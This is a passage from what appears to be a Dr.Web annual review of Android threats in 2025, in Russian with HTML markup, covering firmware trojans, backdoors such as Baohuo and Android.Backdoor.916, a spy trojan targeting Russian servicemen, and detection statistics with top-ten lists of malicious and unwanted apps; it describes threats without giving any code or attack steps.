&lt;p&gt;В 2025 году отмечались и другие случаи проникновения вредоносных программ в системную область Android-устройств. Например, еще одной группе злоумышленников удалось внедрить новые версии опасных троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.Triada&amp;lng=kk"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; в прошивку ряда бюджетных смартфонов. Вредоносные программы Triada опасны тем, что способны заражать системный процесс Zygote. Тот непосредственно участвует в запуске всех приложений в системе, поэтому и трояны Triada в дальнейшем могут внедряться в любое приложение на устройстве, фактически получая над ним полный контроль. Злоумышленники используют этих троянов для загрузки и установки других вредоносных программ, а также нежелательных и рекламных приложений. Кроме того, с их помощью они могут шпионить за жертвами, подписывать их на платные услуги и т. д. Также были выявлены новые случаи заражения прошивок TV-приставок на базе Android новыми версиями трояна &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, которого наша компания &lt;a href="https://news.drweb.ru/show/?i=14900" target="_blank"&gt;обнаружила&lt;/a&gt; в 2024 году. Vo1d представляет собой бэкдор, который помещает свои компоненты в системную область зараженных устройств и по команде атакующих способен скрытно скачивать и устанавливать стороннее ПО.&lt;/p&gt;

&lt;p&gt;Также в апреле наша антивирусная лаборатория &lt;a href="https://news.drweb.ru/show/?i=15006" target="_blank"&gt;зафиксировала&lt;/a&gt; кампанию по распространению трояна-шпиона &lt;a href="https://vms.drweb.kz/search/?q=Android.Spy.1292.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, нацеленного на российских военнослужащих. Злоумышленники встроили вредоносную программу в одну из версий картографического ПО Alpine Quest и распространяли модификацию через созданный ими Telegram-канал, который выдавали за официальный, а также через один из российских каталогов Android-приложений.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Telegram-канал, через который злоумышленники распространяли вредоносную модификацию Alpine Quest, содержащую &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Spy.1292.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; передавал киберпреступникам данные об учетных записях и номере мобильного телефона, контакты из телефонной книги, геолокацию устройства и сведения о хранящихся на нем файлах. Троян мог похищать определенные файлы по команде атакующих. Тех интересовали конфиденциальные документы, которые пользователи отправляли через популярные мессенджеры, а также файл журнала локаций приложения Alpine Quest.&lt;/p&gt;

&lt;p&gt;В августе мы &lt;a href="https://news.drweb.ru/show/?i=15047" target="_blank"&gt;рассказали&lt;/a&gt; о случаях распространения бэкдора &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.916.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; через личные сообщения в популярных мессенджерах. Атакующие предлагали потенциальным жертвам установить «антивирус» из прикрепленного к сообщениям APK-файла, в котором на самом деле и скрывалась вредоносная программа. Наша антивирусная лаборатория обнаружила первые версии &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.916.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; в январе 2025 года и с момента обнаружения отслеживала его активность, что и позволило оперативно выявить данную кампанию.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; вводит пользователей в заблуждение, имитируя работу антивируса&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После установки на Android-устройство &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.916.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; позволяет похищать конфиденциальную информацию и следить за пользователем. Например, с помощью бэкдора злоумышленники могут прослушивать разговоры, передавать трансляцию с камеры, отслеживать местоположение и красть содержимое из мессенджеров и браузеров. Кроме того, &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.916.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; реализует функциональность кейлоггера для перехвата вводимого текста, в том числе — паролей. По оценкам наших специалистов, бэкдор применяется в таргетированных атаках и не предназначен для массового распространения. Основной целью для киберпреступников являются сотрудники российских компаний.&lt;/p&gt;

&lt;p&gt;В октябре «Доктор Веб» &lt;a href="https://news.drweb.kz/show/?i=15076" target="_blank"&gt;опубликовал&lt;/a&gt; сведения о многофункциональном бэкдоре &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, который наши вирусные аналитики обнаружили в модифицированных версиях мессенджера Telegram X. Основным источником его распространения стали вредоносные сайты, куда потенциальные жертвы попадают через рекламу в мобильных приложениях. На этих сайтах пользователям предлагается установить Telegram X — якобы для поиска партнера для общения и свиданий. При этом такие интернет-ресурсы в большей степени ориентированы на жителей Индонезии и Бразилии. В то же время мы выявили этот бэкдор и в ряде сторонних каталогов Android-приложений.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример вредоносного сайта, с которого загружалась троянская версия Telegram X&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Одной из задач &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; является кража конфиденциальных данных. Например, вредоносная программа похищает логин и пароль от учетной записи Telegram жертвы, историю переписки в мессенджере, входящие СМС, контакты из телефонной книги устройства, а также способна перехватывать содержимое буфера обмена. Однако злоумышленники используют ее не только в качестве шпионского приложения. С помощью &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; они фактически могут управлять взломанной учетной записью и контролировать работу Telegram X, изменяя его функциональность. Так, бэкдор позволяет незаметно добавлять пользователя и удалять его из Telegram-каналов, вступать от его лица в чаты и скрывать устройства, авторизованные для его учетной записи. Для выполнения действий, которые требуют вмешательства в логику работы приложения, используется фреймворк Xposed. Киберпреступники управляют бэкдором как традиционным способом — через C2-сервер, так и путем отправки команд через базу данных Redis, что ранее не встречалось в других вредоносных программах для ОС Android. Общее число устройств, зараженных &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, превысило 58 000. При этом были затронуты около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и даже автомобилей с бортовыми компьютерами на базе Android.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_ru_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_ru_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Страны с наибольшим числом устройств, зараженных &lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Статистика&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в 2025 году самыми распространенными Android-угрозами стали различные вредоносные программы — пользователи сталкивались с ними в 81,11% случаев. Следом с долей 10,73% расположились потенциально опасные приложения. Третье место заняли рекламные программы, которые обнаруживались в 5,89% случаев. Наименьшая активность наблюдалась со стороны нежелательного ПО: на него пришлось 2,27% детектирований.&lt;/p&gt;

&lt;p&gt;По сравнению с годом ранее, доля вредоносных и потенциально опасных программ возросла, в то время как доля нежелательного и рекламного ПО снизилась.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;Вредоносные приложения&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;На протяжении нескольких лет рекламные трояны семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; остаются лидерами по числу детектирований вредоносного ПО. В 2025 году ситуация не изменилась, однако за прошедшие 12 месяцев их доля несколько сократилась — с 31,95% до 27,42%.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Эти трояны показывают навязчивую рекламу в виде полноэкранных баннеров и видеороликов. Чтобы пользователям было сложнее обнаружить и удалить вредоносные программы с зараженных устройств, после установки они пытаются «спрятаться», например, скрывая или подменяя свои значки в меню главного экрана.&lt;/p&gt;

&lt;p&gt;Самым активным представителем семейства оказался &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt; — на него пришлось более трети детектирований. Троян попал в поле зрения наших вирусных аналитиков еще в 2024 году и за это время выбился в лидеры. Он является одним из множества вариантов &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt; — вредоносной программы, известной с 2021 года. Распространение получили и несколько ее новых версий — например, &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;. Нельзя исключать, что со временем они также могут подняться на верхние строчки, как это ранее случалось с другими модификациями &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;В течение года пользователи вновь сталкивались с подсемейством &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, Aegis, однако доля таких вредоносных программ от общего числа детектирований семейства заметно сократилась — с 17,37% до 3,11%. Эти трояны отличаются, в том числе, способностью запускаться автоматически после установки. Среди них самыми активными стали варианты &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds.Aegis&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds.Aegis&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Вторым по распространенности вредоносным ПО оказались рекламные трояны &lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;, доля которых по сравнению с 2024 годом увеличилась с 5,38% до 15,64%. Среди них лидировал &lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;. За ними расположились программы-подделки &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые используются в мошеннических целях и вместо обещанной функциональности загружают различные сайты. На них пришлось 10,94% детектирований. Это ниже показателя 2024 года, когда их доля составляла 18,28%. Такое снижение произошло, в том числе, за счет меньшей активности трояна &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;, однако он все еще остается самым распространенным представителем семейства. Его главной задачей является загрузка сайтов онлайн-казино.&lt;/p&gt;

&lt;p&gt;Доля троянских программ семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.Spy&amp;lng=kk"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt;, реализующих различную шпионскую функциональность, сократилась с 11,52% до 3,09%. В то же время повысилась активность банковских троянов. Их доля от общего числа детектирований вредоносных приложений составила 6,94% против показателя 6,29% годом ранее.&lt;/p&gt;

&lt;p&gt;В 2025 году с 5,49% до 6,01% увеличилось число детектирований программных упаковщиков, которые могут использовать, в том числе, и злоумышленники с целью защиты ВПО от обнаружения и анализа. Чаще всего на защищаемых устройствах выявлялись вредоносные программы с упаковщиком &lt;a href="https://vms.drweb.kz/search/?q=Android.Packed&amp;lng=kk"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Распространение получили различные вредоносные моды мессенджера WhatsApp. Среди них были модификации (Dr.Web детектирует их как &lt;a href="https://vms.drweb.kz/search/?q=Android.Click&amp;lng=kk"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;), загружающие веб-сайты незаметно для жертв. Также наблюдалась возросшая активность многофункциональных троянов семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.Triada&amp;lng=kk"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, которые злоумышленники могут внедрять в прошивку Android-устройств. Их доля возросла с 2,74% до 7,48%.&lt;/p&gt;

&lt;p&gt;Десять наиболее часто детектируемых вредоносных Android-приложений в 2025 году:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/08_2025_malware_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/08_2025_malware_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянские программы для показа навязчивой рекламы. Представители этого семейства часто распространяются под видом безобидных приложений и в некоторых случаях устанавливаются в системный каталог другим вредоносным ПО. Попадая на Android-устройства, такие рекламные трояны обычно скрывают от пользователя свое присутствие в системе — например, «прячут» значок приложения из меню главного экрана.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, показывающая надоедливую рекламу. Она представляет собой программный модуль, который разработчики ПО встраивают в приложения.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Click&amp;lng=kk"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Packed&amp;lng=kk"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных приложений, которые упакованы с помощью популярного коммерческого обфускатора кода.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Triada&amp;lng=kk"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование упаковщика для троянов семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.Triada&amp;lng=kk"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, предназначенного для их защиты от анализа и обнаружения. Чаще всего злоумышленники используют его совместно с вредоносными модами мессенджера Telegram, в которые непосредственно встроены эти трояны.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Нежелательное ПО&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Наиболее распространенным нежелательным ПО в 2025 году вновь стали приложения &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;, на которые пришлось 51,96% детектирований. Они предлагают пользователям за вознаграждение выполнять те или иные задания и якобы в дальнейшем позволяют конвертировать награду в настоящие деньги. На самом деле никаких выплат в итоге не происходит. Вместе с &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; распространение получили и другие аналогичные программы, например — &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, однако с ними пользователи сталкивались значительно реже.&lt;/p&gt;

&lt;p&gt;На втором месте с показателем 10,37% расположились программы &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeAntiVirus&amp;lng=kk"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, которые имитируют работу антивирусов и обнаруживают несуществующие угрозы. Для «лечения» заражения они предлагают приобрести полную версию ПО.&lt;/p&gt;

&lt;p&gt;Приложения &lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, которые модифицируются в облачном сервисе CloudInject, с долей 6,41% стали третьими по распространенности. Их варианты, детектируемые как &lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;, с показателем 5,08% оказались рядом с ними на четвертой позиции. Изменения в такие программы вносятся непосредственно на удаленном сервере, а доступ к сервису предоставляет утилита &lt;a href="https://vms.drweb.kz/search/?q=Tool.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;, которая является лишь оболочкой для работы с ним. При модификации к программам добавляются опасные системные разрешения и обфусцированный код. Кроме того, через сервис CloudInject моддеры способны дистанционно управлять модифицированными приложениями, например, заблокировать их и потребовать ввести код для дальнейшего использования.&lt;/p&gt;

&lt;p&gt;В 2025 году наблюдался незначительный рост числа детектирований ряда программ, которые могут применяться для наблюдения за пользователями и контроля их активности. В руках злоумышленников такие инструменты превращаются в шпионское ПО. Так, доля приложения &lt;a href="https://vms.drweb.kz/search/?q=Program.TrackView&amp;lng=kk"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; и его варианта &lt;a href="https://vms.drweb.kz/search/?q=Program.TrackView&amp;lng=kk"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; увеличилась с 2,40% до 2,91% и с 0,21% до 0,97% соответственно. Доля &lt;a href="https://vms.drweb.kz/search/?q=Program.SecretVideoRecorder&amp;lng=kk"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; возросла c 2,03% до 2,56%, а его модификации &lt;a href="https://vms.drweb.kz/search/?q=Program.SecretVideoRecorder&amp;lng=kk"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; — с 0,90% до 1,02%. Показатель программы &lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt; увеличился с 0,31% до 1,01%.&lt;/p&gt;

&lt;p&gt;Десять наиболее часто детектируемых нежелательных приложений в 2025 году:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно перевести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты им не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.FakeAntiVirus&amp;lng=kk"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как &lt;a href="https://vms.drweb.kz/search/?q=Tool.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими — блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.TrackView&amp;lng=kk"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.TrackView&amp;lng=kk"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование приложения, позволяющего вести наблюдение за пользователями через Android-устройства. С помощью этой программы злоумышленники могут определять местоположение целевых устройств, использовать камеру для записи видео и создания фотографий, выполнять прослушивание через микрофон, создавать аудиозаписи и т. д.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.SecretVideoRecorder&amp;lng=kk"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Program.SecretVideoRecorder&amp;lng=kk"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование различных версий приложения для фоновой фото- и видеосъемки через встроенные камеры Android-устройств. Эта программа может работать незаметно, позволяя отключить уведомления о записи, а также изменять значок и описание приложения на фальшивые. Такая функциональность делает ее потенциально опасной.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
